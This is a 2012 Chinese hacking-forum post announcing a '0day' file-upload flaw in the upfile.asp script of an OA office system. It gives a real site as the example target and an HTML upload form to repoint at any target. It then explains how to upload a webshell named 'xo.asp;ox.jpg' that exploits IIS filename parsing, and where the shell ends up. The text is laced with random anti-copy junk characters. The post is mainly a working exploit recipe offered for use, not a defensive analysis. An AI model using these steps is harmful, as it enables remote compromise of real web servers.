中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
- Z& E! o* N6 h- Z. s; N
, c( ^3 A" g' m' M2 n- l4 n) n系统介绍:
/ ^$ Z$ w3 @+ u" m5 I1 k
1 ~: }1 T* w5 e5 P/ ]全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
( B/ e( e  ?* W7 _0 U9 U' @/ Z; I! V/ S4 r% }" U2 _, S( p
主要功能:
) q1 F2 k. }3 k# u# w% w公司通告 " W% V5 c) o  `# n4 M& F5 L' K
工作计划
; o4 V8 F! ~- D. {& }' S通讯助理
) U5 C; S$ i) G. L8 J客户资源
$ {* X5 W6 {$ E我的公文 ( g: i1 c( H9 c! w- i5 b
公文传阅 ( x1 A/ S/ d5 ]& ?- x% X
公共资源
/ G; k& \( `" ?资源预约 * B! c6 w: K1 ~. M% |( C8 \* Q5 S
今日考勤
1 B$ b& F, {8 v3 H' l; I4 c* W个人计划 6 W4 o( G2 h  s4 D5 Z
个人通讯录
1 d2 S! W) [! z+ ?% U: R个人基本档案
0 w6 H* ], O) a# d. _" D未读邮件
! b! z" Q4 w; B- J& P) a发邮件
0 ^, F: s# ?8 u3 `# r收件夹 ) ?/ X1 G8 _; h3 H) W
寄件夹
  [$ N, U- f0 j8 b3 G5 e网络硬盘
7 w- k; u, n, C1 J; _, w网络会议
6 {6 Z; y2 }3 P& H- z网络调查
8 _( L6 q7 K; p3 Q交流论坛6 M& p" w5 D: `# O: W7 R6 w

! s- F, r) v8 N5 F5 r# C: V有兴趣测试的朋友可以下源码看看
' T7 G; N' O/ s' A6 h# y+ U, j- M, q7 K. i! G4 B. E, Q6 |
源码下载:) H  [" T2 A/ x4 c0 j( ~/ W8 N8 @
$ j$ b# F5 O! f4 L
http://www.mycodes.net/30/4750.htm
# e: N: n1 d& I4 E9 b) w
2 p3 h) s& V) l+ }4 @漏洞介绍:! X0 [8 K0 T4 ]3 u- Z) y6 q& R/ v
8 h# `9 i1 d4 `8 c/ v* R
由upfile.asp上传文件漏洞引起
9 ^* H- V' y. r1 w) p2 q8 g- Y
. K" t. i! c: h0 {; r9 F) U  j测试方法:6 C5 v6 h/ I+ P" i

# n- r* }2 X1 ~( _' q使用名小子上传http://www.itlynn.com/upfile.asp即可' d" @+ d3 w3 Z2 W

& r6 R& q2 g( d3 c4 @; ~如果upfile.asp文件被删除不存在。
3 [' N6 S8 D) F: S& [+ T. C/ S- d6 K
3 N! q- p* U; O  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
# N3 M5 |6 L% @  ~
( i* u. k* D- U2 R; r' Y如果存在那么将如下代码保存为upfile.html。4 p4 U; t0 e: d* }+ L
9 C: d" ?0 J& Z( ~
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
8 _( S4 b8 Y$ g$ l  T4 a/ w
  P9 m7 P* O3 T& t4 Q
% ]! \0 Y% B/ A3 |2 d( I" ^0 r! O- n$ u3 f) U  l% n: Q( s# N6 k
01 <table border='0' align="center" cellpadding="5"> & G- I! ~! V' m4 v: B# m/ h1 m

* m. s/ l1 `& s02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
3 c" M' x1 s+ ]9 U  d, T' x4 @6 a2 |% A; l/ d& [
03 <tr> 6 l( {. x0 x5 ~

$ v; h& c0 g9 g; O) l04             <td>报错:</td> 4 o; l. T( N% C1 U+ y9 S
4 @/ O" O4 p7 K, ?6 _# a( B! U
05             <td><input type='radio' name='errnumber' value='0'> & E+ Y+ G  W, Y  Q+ d# N

+ {* z6 x" }- x4 ?4 C06               自动更名 0 d* Y% W; b1 d) O& z

, h. h0 P6 ]8 d9 U7 w* \( V07               <input type='radio' name='errnumber' value='1' checked>
3 I  Y( i( k- E1 \+ {9 g# p9 O/ G, l8 S! e* i1 ]2 u0 s# H
08               报错方式 % a0 t0 u6 W1 G& X/ j. b
2 m/ g" g7 T% m4 s8 W1 S
09               <input type='radio' name='errnumber' value='2'> . _" p2 [: Z9 o6 K+ a5 [
% R0 T- A5 |( E6 C5 A% S
10               直接覆盖</td> : I+ q2 b+ L* p0 H& O: U( \

2 X% [; `! @" @4 J9 q' i- |- g; ~11           </tr>
5 _9 R) l0 r& ]/ u! F. ^$ r7 j
! O5 H+ g  p' Q( V3 ^$ X12           <tr> . W7 B- R' d- m+ Z

( I! X7 y/ A4 g9 u; B13             <td>主题:</td>
/ i) }; k5 h+ `  l: I( p+ @. e  P/ N4 S: T8 x/ H# Y
14             <td><input type='text' name='filename' size='30'></td> 3 p: x. [* g! r; o) O* F
; R' k, c: K# L
15           </tr>
% N$ `  H4 n+ r! a* R! V$ y4 S
" I* S8 g4 o: x6 c  }0 K, P& u' i' e16           <tr>
: E" I4 Y( r$ ?, J" a+ Y+ I) I' H8 I
17             <td>文件:</td>
# f) m* g+ z: w9 K5 a4 y( n+ \, v# v# M
18             <td><input type="file"name="fruit"size="30"></td>
7 g9 @! P1 i4 ]# Q
+ M0 `# `6 G- Y! b! N+ b19           </tr> 8 u8 y7 e5 p0 E; {1 F5 w

9 r1 Q* g3 Q* N! V20           <tr>
/ X. s; i) g3 q4 h* ?% W4 ]- ]( D, E4 I! Y  {4 D
21             <td valign='top'>简介:</td>
1 B# ^. p% C  I9 k# Z& R/ w5 t  u; w
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> & f' z4 K/ D# i4 d& \- a# j
  b6 d" X( X. i- L! G: U8 P: T
23           </tr> 5 o1 F, N( p/ t$ W7 ?

7 a7 [! Y/ m% Z, t24   
* h& T% s, y) o; q6 e' D9 P0 _+ x4 D: u
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
" l1 `, C7 }. z/ V- U
+ n8 K- i1 h9 ~, B& \3 c26           </tr> ) e( z3 ^% n& F

+ V* t' P, j2 W; L& S4 Q, G27         </form> + T$ @1 K$ I" P' `1 A0 d  J

+ ]8 E! |; A  |- M然后打开上传一个文件名为xo.asp;ox.jpg的文件。/ m' A" q* f% V  K! h, Q2 _
5 T7 v9 f+ D9 @9 Y% l  g

) s& J( B9 C0 B7 c" X, O7 D& g. j' Q0 @+ ?( {' T$ A9 P: }5 t
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
3 A! O. z5 o, X* c3 `
" _+ A( H" W6 V0 l. ^4 K此漏洞需要配合解析漏洞利用。2 E8 f, D( [/ O0 T% ^8 r! Y) V% z! \' |
- C) s) g# m+ }* R2 \





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2